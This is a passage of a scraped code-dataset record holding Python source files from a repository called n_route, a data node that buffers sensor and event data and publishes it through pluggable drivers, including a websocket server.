[]\n event_list = 
event_list_pb2.event_list()\n event_list.ParseFromString(msg_data)\n for event in event_list.events:\n data = Event(event.source, event.event_type, event.level, event.keyword, event.content, event.timestamp)\n data_list.append(data)\n return data_list\n\n" }, { "alpha_fraction": 0.5276816487312317, "alphanum_fraction": 0.5346021056175232, "avg_line_length": 22.581632614135742, "blob_id": "23cefc2177e5b1e552b4784724013c7485a0013d", "content_id": "037b26dba50415501bf7d49178100a506559846e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2606, "license_type": "no_license", "max_line_length": 67, "num_lines": 98, "path": "/n_route/app/store.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: store.py\n@time: 2019/08/28\n@desc:数据缓存区\n\"\"\"\nimport queue\n\n\n# 连续数据\nclass Sequence:\n def __init__(self, max_length):\n # 连续数据:数组\n self.__series_list = []\n # 数据索引字典\n self.__tag_index_dict = {}\n # 数据长度\n self.__data_count = -1\n # 最大数组个数\n self.__max_length = max_length\n\n # 写入单个数据\n def put_data(self, key, data):\n try:\n index = self.__tag_index_dict[key]\n self.__series_list[index] = data\n except:\n index = len(self.__series_list)\n # 当数据量大于设置的最大数据量时,写入失败\n if index > self.__max_length:\n return -1\n self.__series_list.append(data)\n self.__tag_index_dict[key] = index\n self.__data_count = index + 1\n return index\n\n # 根据标签点名称集合获取索引位置集合\n def get_index(self, key):\n if key in self.__tag_index_dict:\n return self.__tag_index_dict[key]\n return -1\n\n # 读取单个数据(按照索引)\n def get_data(self, index):\n if index < 0 or index >= self.__data_count:\n return None\n return self.__series_list[index]\n\n # 读取全部数据\n def get_data_all(self):\n return self.__series_list\n\n # 获取数据长度\n def get_data_len(self):\n return self.__data_count\n\n # 清空数据\n def clear(self):\n self.__series_list.clear()\n self.__data_count = 0\n\n\n# 
离散数据\nclass Discrete:\n def __init__(self, max_length):\n # 最大数据个数\n self.__max_length = max_length\n # 离散数据队列\n self.__discrete_queue = queue.Queue(self.__max_length)\n\n # 写入单个数据\n def put_data(self, data):\n self.__discrete_queue.put(data, block=True)\n\n # 读取单个数据\n def get_data(self):\n try:\n return self.__discrete_queue.get(block=True, timeout=5)\n except Exception:\n return None\n\n # 读取全部数据\n def get_data_all(self):\n data_list = []\n while not self.__discrete_queue.empty():\n data_list.append(self.__discrete_queue.get())\n return data_list\n\n # 获取数据长度\n def get_data_len(self):\n return self.__discrete_queue.qsize()\n\n # 清空数据\n def clear(self):\n while not self.__discrete_queue.empty():\n self.__discrete_queue.get()\n\n" }, { "alpha_fraction": 0.541863739490509, "alphanum_fraction": 0.5455692410469055, "avg_line_length": 37.20481872558594, "blob_id": "57fc69e8dfa6a410cd9cffc69add105034b227f5", "content_id": "5ab1b9ca91d87ea4cabf9fdeef6574f4880c62de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14278, "license_type": "no_license", "max_line_length": 123, "num_lines": 332, "path": "/n_route/app/core.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: core.py\n@time: 2019/09/09\n@desc:\n\"\"\"\nimport json\nimport time\nfrom pump import PubSeq, PubDis\nfrom share import Data\nfrom store import Sequence, Discrete\nfrom cfg import Cfg\nfrom share import LOG, DEBUG\nfrom share import load_python, load_csharp, load_config, check_api_result\n\n\nclass Core:\n class TopicDataInfo:\n def __init__(self, topic, data_count, last_time):\n self.topic = topic\n self.data_count = data_count\n self.last_time = last_time\n\n def __init__(self):\n # 配置\n self.m_cfg = Cfg()\n # 基础配置\n self.m_cfg.load_cfg('basic.json')\n self.basic_info = self.m_cfg.get_basic_cfg()\n # 下行连续数据区\n self.m_store_seq_down = 
Sequence(self.basic_info.sequence_max)\n # 下行离散数据区\n self.m_store_dis_down = Discrete(self.basic_info.discrete_max)\n # 上行连续数据区\n self.m_store_seq_up = Sequence(self.basic_info.sequence_max)\n # 上行离散数据区\n self.m_store_dis_up = Discrete(self.basic_info.discrete_max)\n # 上行连续发布泵(关联下行连续数据区)\n self.m_pump_seq_up = PubSeq(self.m_store_seq_down)\n # 上行离散发布泵(关联下行离散数据区)\n self.m_pump_dis_up = PubDis(self.m_store_dis_down)\n # 下行连续发布泵(关联上行连续数据区)\n self.m_pump_seq_down = PubSeq(self.m_store_seq_up)\n # 下行离散发布泵(关联上行离散数据区)\n self.m_pump_dis_down = PubDis(self.m_store_dis_up)\n # 驱动字典\n self.m_driver_dict = {}\n # 主题字典\n self.m_topic_dict = {}\n # 主题数据字典\n self.m_topic_data_dict = {}\n\n # 加载配置\n def load_cfg(self, file_name):\n self.m_cfg.load_cfg(file_name)\n\n # 加载驱动\n def load_driver(self):\n self.m_driver_dict = self.m_cfg.get_driver_cfg()\n for driver_info in self.m_driver_dict.values():\n # 加载驱动对象\n if driver_info.lib_type == 'python':\n # python版本的驱动\n driver = load_python(driver_info.lib_name)\n elif driver_info.lib_type == 'csharp':\n # C#版本的驱动\n driver = load_csharp(driver_info.driver_name)\n else:\n # 其它语言版本的驱动暂不支持(待扩充)\n driver = None\n LOG.error('不支持的库类型:%s' % (driver_info.lib_type,))\n if driver:\n driver_info.driver = driver\n LOG.info('加载驱动成功:%s' % (driver_info.driver_name,))\n else:\n LOG.error('加载驱动失败:%s' % (driver_info.driver_name,))\n\n # 加载主题\n def load_topic(self):\n self.m_topic_dict = self.m_cfg.get_topic_cfg()\n\n # 初始化驱动\n def init_driver(self):\n # 遍历驱动字典\n for driver_info in self.m_driver_dict.values():\n if not driver_info.driver:\n LOG.error('驱动%s未加载' % (driver_info.driver_name,))\n continue\n # 1.设置驱动基础配置\n if not self.__driver_set_basic_config(driver_info):\n continue\n # 2.设置驱动运行配置\n if not self.__driver_set_run_config(driver_info):\n continue\n # 3.驱动初始化操作\n ret = driver_info.driver.init()\n if check_api_result(ret):\n LOG.info('驱动 %s 初始化成功' % driver_info.driver_name)\n else:\n LOG.error('驱动 %s 初始化失败' % driver_info.driver_name)\n continue\n # 
4.设置回调函数\n if not self.__driver_set_call_back(driver_info):\n continue\n # 5.启动驱动\n ret = driver_info.driver.run()\n if check_api_result(ret):\n LOG.info('启动 %s 成功' % driver_info.driver_name)\n else:\n LOG.error('启动 %s 失败' % driver_info.driver_name)\n continue\n\n # 加载发布泵\n def load_pump(self):\n pumbs_cfg = self.m_cfg.get_pump_cfg()\n # 遍历发布泵配置\n for pump_info in pumbs_cfg:\n # 主题配置信息\n if pump_info.topic not in self.m_topic_dict:\n LOG.error('%s 主题未配置' % (pump_info.topic,))\n continue\n topic_info = self.m_topic_dict[pump_info.topic]\n # 驱动配置信息\n if pump_info.driver not in self.m_driver_dict:\n LOG.error('%s 驱动未配置' % (pump_info.driver,))\n continue\n driver_info = self.m_driver_dict[pump_info.driver]\n # 关联发布泵:pump,driver,topic,cycle\n if self.__pump_set_config(driver_info, topic_info, pump_info.cycle):\n LOG.info('关联发布泵成功:%s:%s:%d' % (driver_info.driver_name, topic_info.topic, pump_info.cycle))\n else:\n continue\n\n # 设置运行时配置\n def set_run_config(self, cfg_name, cfg_msg):\n for driver_info in self.m_driver_dict.values():\n # 查找到对应的驱动\n if driver_info.config['cfg'] == cfg_name:\n # 设置驱动运行时配置\n return self.__driver_set_run_config(driver_info)\n return False\n\n # 主进行函数\n def my_main(self):\n # 加载驱动\n self.load_driver()\n # 加载主题\n self.load_topic()\n # 初始化驱动\n self.init_driver()\n # 加载发布泵\n self.load_pump()\n if DEBUG:\n self.__test()\n\n # -----------------内部函数---------------------\n\n # 写入下行连续数据区\n def __write_data_seq_sensor_down(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n self.m_store_seq_down.put_data(data.tag, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入下行连续数据区\n def __write_data_seq_event_down(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n key = data.source + data.keyword\n self.m_store_seq_down.put_data(key, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入下行离散数据区\n def __write_data_dis_down(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for 
data in data_list:\n self.m_store_dis_down.put_data(data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入上行连续数据区\n def __write_data_seq_sensor_up(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n self.m_store_seq_up.put_data(data.tag, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入上行连续数据区\n def __write_data_seq_event_up(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n key = data.source + data.keyword\n self.m_store_seq_up.put_data(key, data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 写入上行离散数据区\n def __write_data_dis_up(self, data_info, data_list):\n # 将数据写入到数据缓存区\n for data in data_list:\n self.m_store_dis_up.put_data(data)\n # 保存数据状态信息\n self.__save_data_info(data_info, len(data_list))\n\n # 保存主题数据状态\n def __save_data_info(self, data_info, data_len):\n data_info = json.loads(data_info)\n if 'topic' in data_info and len(data_info['topic']) > 0:\n # 保存当前主题对应的数据信息(主题、个数、最后更新时间)\n self.m_topic_data_dict[data_info['topic']] = self.TopicDataInfo(data_info['topic'], data_len, int(time.time()))\n else:\n # 默认主题(主题、个数、最后更新时间)\n topic = 'all'\n self.m_topic_data_dict[topic] = self.TopicDataInfo(topic, data_len, int(time.time()))\n\n # 驱动设置基础配置\n def __driver_set_basic_config(self, driver_info):\n if driver_info.basic_config:\n ret = driver_info.driver.set_basic_config(driver_info.basic_config,\n json.dumps(load_config(driver_info.basic_config)))\n if not check_api_result(ret):\n LOG.error('驱动 %s 设置基础配置失败' % driver_info.driver_name)\n return False\n LOG.info('驱动 %s 设置基础配置成功' % driver_info.driver_name)\n return True\n\n # 驱动设置运行配置\n def __driver_set_run_config(self, driver_info):\n if driver_info.run_config:\n ret = driver_info.driver.set_run_config(driver_info.run_config,\n json.dumps(load_config(driver_info.run_config)))\n if not check_api_result(ret):\n LOG.error('驱动 %s 设置运行配置失败' % driver_info.driver_name)\n return False\n LOG.info('驱动 %s 
设置运行配置成功' % driver_info.driver_name)\n return True\n\n # 驱动设置回调函数\n def __driver_set_call_back(self, driver_info):\n if driver_info.direction == 'down':\n if driver_info.sub_type == 'seq_sensor':\n # 设置下行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_sensor_down)\n elif driver_info.sub_type == 'seq_event':\n # 设置下行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_event_down)\n elif driver_info.sub_type in ('dis_sensor', 'dis_event'):\n # 设置下行离散回调\n ret = driver_info.driver.set_fun(self.__write_data_dis_down)\n else:\n if driver_info.sub_type is not None:\n LOG.error('驱动%s采集方式配置错误:%s' % (driver_info.driver_name, driver_info.sub_type))\n return False\n elif driver_info.direction == 'up':\n if driver_info.sub_type == 'seq_sensor':\n # 设置上行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_sensor_up)\n elif driver_info.sub_type == 'seq_event':\n # 设置上行连续回调\n ret = driver_info.driver.set_fun(self.__write_data_seq_event_up)\n elif driver_info.sub_type in ('dis_sensor', 'dis_event'):\n # 设置上行离散回调\n ret = driver_info.driver.set_fun(self.__write_data_dis_up)\n else:\n if driver_info.sub_type is not None:\n LOG.error('驱动%s采集方式配置错误:%s' % (driver_info.driver_name, driver_info.sub_type))\n return False\n else:\n LOG.error('驱动%s数据流向配置错误:%s' % (driver_info.driver_name, driver_info.direction))\n return False\n if not check_api_result(ret):\n LOG.error('设置 %s 回调失败' % driver_info.driver_name)\n return False\n LOG.info('设置 %s 回调成功' % driver_info.driver_name)\n return True\n\n # 关联pump,topic,driver\n def __pump_set_topic_driver(self, pump, topic_info, driver_info, cycle):\n pump.set_topic_info(topic_info.topic, topic_info.tags)\n pump.set_driver_info(driver_info.driver_name, driver_info.driver, topic_info.topic, cycle)\n\n # 发布泵配置\n def __pump_set_config(self, driver_info, topic_info, cycle):\n if driver_info.direction == 'down':\n if driver_info.pub_type in ('seq_sensor', 'seq_event'):\n # 设置下行连续泵\n 
self.__pump_set_topic_driver(self.m_pump_seq_down, topic_info, driver_info, cycle)\n elif driver_info.pub_type in ('dis_sensor', 'dis_event'):\n # 设置下行离散泵\n self.__pump_set_topic_driver(self.m_pump_dis_down, topic_info, driver_info, cycle)\n else:\n LOG.error('驱动 %s 发布方式配置错误:%s' % (driver_info.driver_name, driver_info.pub_type))\n return False\n elif driver_info.direction == 'up':\n if driver_info.pub_type in ('seq_sensor', 'seq_event'):\n # 设置上行连续泵\n self.__pump_set_topic_driver(self.m_pump_seq_up, topic_info, driver_info, cycle)\n elif driver_info.pub_type in ('dis_sensor', 'dis_event'):\n # 设置上行离散泵\n self.__pump_set_topic_driver(self.m_pump_dis_up, topic_info, driver_info, cycle)\n else:\n LOG.error('驱动 %s 发布方式配置错误:%s' % (driver_info.driver_name, driver_info.pub_type))\n return False\n else:\n LOG.error('驱动 %s 数据流向配置错误:%s ' % (driver_info.driver_name, driver_info.direction))\n return False\n return True\n\n # 测试\n def __test(self):\n data = Data('tag1', 0, 192, int(time.time()), value_double=1.1)\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag2', 1, 192, int(time.time()), value_int64=8)\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag3', 2, 192, int(time.time()), value_string='hello')\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag4', 3, 192, int(time.time()), value_bytes=b'fuck')\n self.m_store_seq_down.put_data(data.tag, data)\n data = Data('tag10', 2, 192, int(time.time()), value_string='hello')\n self.m_store_dis_up.put_data(data)\n\n\nif __name__ == \"__main__\":\n m_core = Core()\n m_core.my_main()\n while True:\n time.sleep(1)\n" }, { "alpha_fraction": 0.5134376287460327, "alphanum_fraction": 0.5152426958084106, "avg_line_length": 29.968944549560547, "blob_id": "87bd83b44f69756e533ec0c4753a03285b5bc5e1", "content_id": "1d1144b3434e6a5eeaa8f0c1eef9906a250b0610", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5554, "license_type": 
"no_license", "max_line_length": 123, "num_lines": 161, "path": "/n_route/app/cfg.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: cfg.py\n@time: 2019/09/08\n@desc:\n\"\"\"\nimport json\nfrom share import LOG\nfrom share import load_config\nfrom share import Data_Mode_Dict, Data_dir_Dict\n\n\n# 基础配置\nclass BasicInfo:\n def __init__(self, server_name, server_version, server_desc, local_ip, local_port, sequence_max, discrete_max, domain):\n # 服务名称\n self.server_name = server_name\n # 服务版本号\n self.server_version = server_version\n # 服务描述\n self.server_desc = server_desc\n # 本机ip\n self.local_ip = local_ip\n # 本机端口号\n self.local_port = local_port\n # 数组最大缓存个数\n self.sequence_max = sequence_max\n # 队列最大缓存个数\n self.discrete_max = discrete_max\n # 数据域\n self.domain = domain\n\n\n# 驱动配置\nclass DriverInfo:\n def __init__(self, driver_name, lib_name, lib_type, basic_config, run_config, direction, sub_type, pub_type):\n # 驱动名称\n self.driver_name = driver_name\n # 驱动库名称\n self.lib_name = lib_name\n # 驱动编程语言\n self.lib_type = lib_type\n # 驱动基础配置文件\n self.basic_config = basic_config\n # 驱动运行配置文件\n self.run_config = run_config\n # 数据流向(采集为下:down, 发布为上:up)\n self.direction = direction\n # 订阅数据类型(seq_sensor:连续传感类数据;dis_sensor:离散传感类数据;dis_event:离散事件类数据)\n self.sub_type = sub_type\n # 发布数据类型(seq_sensor:连续传感类数据;dis_sensor:离散传感类数据;dis_event:离散事件类数据)\n self.pub_type = pub_type\n # 驱动对象\n self.driver = None\n\n\n# 主题配置\nclass TopicInfo:\n def __init__(self, topic, tags):\n # 发布主题\n self.topic = topic\n # 发布标签点\n self.tags = tags\n\n\n# 发布泵配置\nclass PumpInfo:\n def __init__(self, topic, driver, cycle):\n # 发布主题\n self.topic = topic\n # 发布驱动名称\n self.driver = driver\n # 发布周期\n self.cycle = cycle\n\n\n# 配置对象\nclass Cfg:\n def __init__(self):\n # 配置对象字典\n self.__cfg_msg = {}\n\n # 加载配置\n def load_cfg(self, cfg_name):\n try:\n self.__cfg_msg = load_config(cfg_name)\n except Exception as 
err:\n LOG.error('加载%s配置文件失败:%s' % (cfg_name, err))\n return False\n LOG.info('加载%s配置成功' % cfg_name)\n\n # 加载基础配置\n def get_basic_cfg(self):\n basic = BasicInfo(self.__cfg_msg['server_name'],\n self.__cfg_msg['server_version'],\n self.__cfg_msg['server_desc'],\n self.__cfg_msg['local_ip'],\n self.__cfg_msg['local_port'],\n self.__cfg_msg['sequence_max'],\n self.__cfg_msg['discrete_max'],\n self.__cfg_msg['domain'])\n return basic\n\n # 加载驱动配置\n def get_driver_cfg(self):\n drivers_dict = {}\n if 'driver' not in self.__cfg_msg:\n return drivers_dict\n driver_cfg = self.__cfg_msg['driver']\n for cfg in driver_cfg:\n driver = DriverInfo(cfg['driver_name'],\n cfg['lib_name'],\n cfg['lib_type'],\n cfg['basic_config'],\n cfg['run_config'],\n cfg['direction'],\n cfg['sub_type'],\n cfg['pub_type'])\n drivers_dict[driver.driver_name] = driver\n # 关键配置校验\n for driver in drivers_dict.values():\n if driver.direction not in Data_dir_Dict:\n LOG.error('驱动配置错误: %s: %s' % (driver.driver_name, driver.direction))\n if driver.sub_type and driver.sub_type not in Data_Mode_Dict:\n LOG.error('驱动配置错误: %s: %s' % (driver.driver_name, driver.sub_type))\n if driver.pub_type and driver.pub_type not in Data_Mode_Dict:\n LOG.error('驱动配置错误: %s: %s' % (driver.driver_name, driver.pub_type))\n return drivers_dict\n\n # 加载主题配置\n def get_topic_cfg(self):\n topics_dict = {}\n if 'topic' not in self.__cfg_msg:\n return topics_dict\n topic_cfg = self.__cfg_msg['topic']\n for cfg in topic_cfg:\n topic = TopicInfo(cfg['topic'], cfg['tags'])\n topics_dict[topic.topic] = topic\n return topics_dict\n\n # 加载发布配置\n def get_pump_cfg(self):\n pumps = []\n if 'pump' not in self.__cfg_msg:\n return pumps\n pump_cfg = self.__cfg_msg['pump']\n for cfg in pump_cfg:\n pump = PumpInfo(cfg['topic'], cfg['driver'], cfg['cycle'])\n pumps.append(pump)\n for pump in pumps:\n if pump.topic not in self.get_topic_cfg():\n LOG.error('发布泵配置错误: %s: %s' % (pump.driver, pump.topic))\n if pump.driver not in self.get_driver_cfg():\n 
LOG.error('发布泵配置错误: %s: %s' % (pump.driver, pump.topic))\n return pumps\n\n\nif __name__ == \"__main__\":\n print(\"hello world\")\n" }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 12, "blob_id": "40ac1cd1895697de00c60df4654f2805f246e0da", "content_id": "a58d61aa73d607c732912a23483dbcfa27eab601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 15, "num_lines": 2, "path": "/README.md", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "# n_route\n数据节点。用于数据的接入和转发\n" }, { "alpha_fraction": 0.5252880454063416, "alphanum_fraction": 0.5338801145553589, "avg_line_length": 28.773256301879883, "blob_id": "07b4ac4bd24452981912deeeffb053ebb54f1f63", "content_id": "d05db37868ff4b3f5f97e8b3b69e98b3f8932e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5745, "license_type": "no_license", "max_line_length": 117, "num_lines": 172, "path": "/n_route/app/driver_websocket.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: driver_websocket.py\n@time: 2019/09/18\n@desc:\n\"\"\"\n\nimport json\nimport threading\nimport logging\nfrom websocket_server import WebsocketServer\nfrom share import sensor2dict, event2dict\nfrom share import RET_OK, RET_FAIL_PARAM, RET_FAIL_EXEC\n\n# 日志\nLOG = logging.getLogger('driver_websocket')\n# 驱动版本号\ndriver_version = 'v1.0'\n# 驱动名称\ndriver_name = 'driver_websocket.py'\n# 驱动描述\ndriver_desc = 'websocket驱动程序v1.0版本(20190918)'\n\n\nclass DataDriver:\n # 客户端信息\n class ClientInfo:\n def __init__(self, client, address):\n # 客户端对象\n self.client = client\n # 客户端地址\n self.address = address\n # 客户端订阅主题\n self.topic = ''\n\n def __init__(self):\n # 本地ip地址\n self.__host = ''\n # 本地端口号\n self.__port = 0\n # 
数据模式:sensor(传感类数据);event(事件类数据)\n self.__model = ''\n # websocket服务器对象\n self.__web_server = None\n # 客户端字典\n self.__client_dict = {}\n # 组装数据函数字典\n self.__package = {'sensor': self.__package_sensor_data, 'event': self.__package_event_data}\n\n # 获取版本信息\n def get_version(self):\n return json.dumps({'code': 0, 'data': {'version': driver_version, 'name': driver_name, 'desc': driver_desc}})\n\n # 设置基础配置\n def set_basic_config(self, cfg_name, cfg_msg):\n # 解析配置\n try:\n cfg = json.loads(cfg_msg, encoding='utf-8')\n self.__host, self.__port, self.__model = cfg['host'], cfg['port'], cfg['model']\n except Exception as err:\n LOG.error('解析基础配置失败:%s' % (str(err),))\n return RET_FAIL_PARAM\n # 校验配置\n if self.__model not in ('sensor', 'event'):\n LOG.error('校验基础配置失败:%s' % self.__model)\n return RET_FAIL_PARAM\n LOG.info('设置基础配置成功')\n return RET_OK\n\n # 设置运行时配置\n def set_run_config(self, cfg_name, cfg_msg):\n # 无运行时配置,直接返回\n return RET_OK\n\n # 初始化\n def init(self):\n try:\n # 启动WebSocket服务\n self.__web_server = WebsocketServer(self.__port, self.__host)\n # 注册回调函数\n self.__web_server.set_fn_new_client(self.__new_client)\n self.__web_server.set_fn_client_left(self.__client_left)\n self.__web_server.set_fn_message_received(self.__msg_receive)\n # 创建WebSocket服务线程\n t1 = threading.Thread(target=self.__web_server.run_forever)\n t1.start()\n except Exception as err:\n LOG.error('初始化失败:%s' % (str(err),))\n return RET_FAIL_EXEC\n LOG.info('驱动初始化成功。创建websocket服务端:%s:%d' % (self.__host, self.__port))\n return RET_OK\n\n # 设置回调函数\n def set_fun(self, fun):\n # 无需回调,直接返回\n return RET_OK\n\n # 写入数据(对外发布数据)\n def write_data(self, data_info, data_list):\n try:\n # 解析data_info里的topic\n data_info = json.loads(data_info, encoding='utf-8')\n topic = data_info['topic']\n for info in self.__client_dict.values():\n if topic == info.topic:\n self.__web_server.send_message(info.client, self.__package_data(data_list))\n except Exception as err:\n LOG.error('发布数据失败:%s' % str(err))\n return 
RET_FAIL_EXEC\n return RET_OK\n\n # 启动运行\n def run(self):\n # 无需启动,直接返回\n return RET_OK\n\n # 停止运行\n def stop(self):\n # 无需停止,直接返回\n return RET_OK\n\n # 获取状态\n def get_state(self):\n state = 0x00000000\n return json.dumps({'code': 0, 'data': state})\n\n # ---------------------------------------内部实现---------------------------------------------\n # 新客户端连接\n def __new_client(self, client, server):\n if client:\n LOG.info(\"新的页面客户端连接: %d, %s\" % (client['id'], str(client['address'])))\n self.__client_dict[client['id']] = self.ClientInfo(client, client['address'])\n\n # 接收到页面请求\n def __msg_receive(self, client, server, message):\n if client:\n LOG.info(\"接收到页面%d请求:%s...\" % (client['id'], message[:100]))\n try:\n msg_dict = json.loads(message)\n topic = msg_dict['topic']\n self.__client_dict[client['id']].topic = topic\n except Exception:\n server.send_message(client, 'pong')\n\n # 页面离开\n def __client_left(self, client, server):\n if client:\n LOG.info('页面断开连接:%d, %s' % (client['id'], str(client['address'])))\n if client['id'] in self.__client_dict:\n self.__client_dict.pop(client['id'])\n\n # 组装数据\n def __package_data(self, data_list):\n return self.__package[self.__model](data_list)\n\n # 组装传感类数据\n def __package_sensor_data(self, data_list):\n datas = []\n for data in data_list:\n datas.append(sensor2dict(data))\n return json.dumps(datas)\n\n def __package_event_data(self, data_list):\n datas = []\n for data in data_list:\n datas.append(event2dict(data))\n return json.dumps(datas)\n\nif __name__ == \"__main__\":\n print(\"hello world\")\n" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.46704021096229553, "avg_line_length": 28.314008712768555, "blob_id": "4fe4222af5f8df27f6a2d95ad18e14aabd55b536", "content_id": "ba3bbfd029ccf91d1a8cc226b21e976cad2f1ebc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7174, "license_type": "no_license", "max_line_length": 93, "num_lines": 207, "path": 
"/n_route/app/pump.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: pump.py\n@time: 2019/09/05\n@desc:\n\"\"\"\nimport json\nimport threading\nimport time\nfrom share import DEBUG\n\n\n# 发布连续数据\nclass PubSeq:\n # 驱动配置信息\n class __DriverInfo:\n def __init__(self, driver, topic, cycle):\n # 发布驱动\n self.driver = driver\n # 订阅主题\n self.topic = topic\n # 发布周期\n self.cycle = cycle\n # 发布计数器\n self.count = 0\n\n # 主题配置信息\n class __TopicInfo:\n # 主题功能待完善扩充\n def __init__(self, topic, tags):\n # 订阅主题\n self.topic = topic\n # 标签点集合\n self.tags = tags.split(',')\n # 索引位置集合\n self.indexs = []\n # 索引位置查找标识\n self.index_flag = False\n\n def __init__(self, data_store):\n # 数据源\n self.__data_store = data_store\n # 主题配置字典(供读取、筛选数据使用)\n self.__topic_dict = {}\n # 驱动配置字典(供发布数据使用)\n self.__driver_dict = {}\n # 数据域(接入节点发布数据时,需要添加数据域)\n self.__domain = ''\n # 创建发布数据线程\n self.__thread_pub = threading.Thread(target=self.__fun)\n # 启动发布数据线程\n self.__thread_pub.start()\n\n # 设置数据域\n def set_data_domain(self, domain):\n self.__domain = domain\n\n # 设置主题\n def set_topic_info(self, topic, tags):\n self.__topic_dict[topic] = self.__TopicInfo(topic, tags)\n\n # 设置驱动\n def set_driver_info(self, driver_name, driver, topic, cycle):\n # 驱动名称+发布主题\n key = driver_name + topic\n self.__driver_dict[key] = self.__DriverInfo(driver, topic, cycle)\n\n # 根据主题获取数据(待扩充完善)\n def __get_data_by_topic(self, topic_info):\n if topic_info.topic == 'all':\n # all主题,获取全部数据\n data_list = self.__data_store.get_data_all()\n else:\n # 其它主题,查找索引位置集合\n if not topic_info.index_flag:\n # 查询索引位置\n topic_info.indexs.clear()\n topic_info.index_flag = True\n for tag in topic_info.tags:\n # 根据tag查找index\n index = self.__data_store.get_index(tag)\n if index == -1:\n # 查找索引失败\n topic_info.index_flag = False\n topic_info.indexs.append(index)\n # 根据索引位置查找数据\n data_list = []\n for index in topic_info.indexs:\n data = 
self.__data_store.get_data(index)\n if data:\n # 读取到数据后添加到数组\n data_list.append(data)\n if len(self.__domain) > 0:\n # 如果存在数据域\n for data in data_list:\n # 对测点tag添加数据域\n data.tag = self.__domain + ':' + data.tag\n return data_list\n\n # 发布数据函数\n def __fun(self):\n while True:\n b_time = time.time()\n # 遍历所有驱动\n for info in self.__driver_dict.values():\n # 驱动达到发送周期\n if info.count == 0:\n # 查找驱动对应的主题配置\n topic_info = self.__topic_dict[info.topic]\n # 根据主题查找数据\n data_list = self.__get_data_by_topic(topic_info)\n # 驱动发送数据\n info.driver.write_data(json.dumps({'topic': info.topic}), data_list)\n # 计数器加1\n info.count += 1\n if info.count >= info.cycle:\n # 计数器达到发送周期时,计数器清零。触发发送数据\n info.count = 0\n # 每个轮询周期休眠1秒\n e_time = time.time()\n used_time = e_time - b_time\n if used_time < 1:\n time.sleep(1 - used_time)\n\n\n# 发布离散数据\nclass PubDis:\n # 驱动配置信息\n class __DriverInfo:\n def __init__(self, driver, topic):\n # 发布驱动\n self.driver = driver\n # 主题\n self.topic = topic\n\n # 主题配置信息\n class __TopicInfo:\n def __init__(self, topic, tags):\n # 主题\n self.topic = topic\n # 测点\n self.tags = tags.split(',')\n\n def __init__(self, data_store):\n # 数据源\n self.__data_store = data_store\n # 主题配置字典(供读取、筛选数据使用)\n self.__topic_dict = {}\n # 驱动配置字典(供发布数据使用)\n self.__driver_dict = {}\n # 数据域(接入节点发布数据时,需要添加数据域)\n self.__domain = ''\n # 创建发布数据线程\n self.__thread_pub = threading.Thread(target=self.__fun)\n # 启动发布数据线程\n self.__thread_pub.start()\n\n # 设置数据域\n def set_data_domain(self, domain):\n self.__domain = domain\n\n # 设置主题\n def set_topic_info(self, topic, tags=''):\n self.__topic_dict[topic] = self.__TopicInfo(topic, tags)\n\n # 设置驱动\n def set_driver_info(self, driver_name, driver, topic, cycle=0):\n # 驱动名称+发布主题\n key = driver_name + topic\n self.__driver_dict[key] = self.__DriverInfo(driver, topic)\n\n # 根据主题筛选数据(待扩充完善)\n def __get_data_by_topic(self, data, topic_info):\n if topic_info.topic == 'control':\n # all主题,返回全部数据\n return data\n else:\n # 目前对离散数据值过滤,只实现对传感类数据的标签点过滤\n try:\n if 
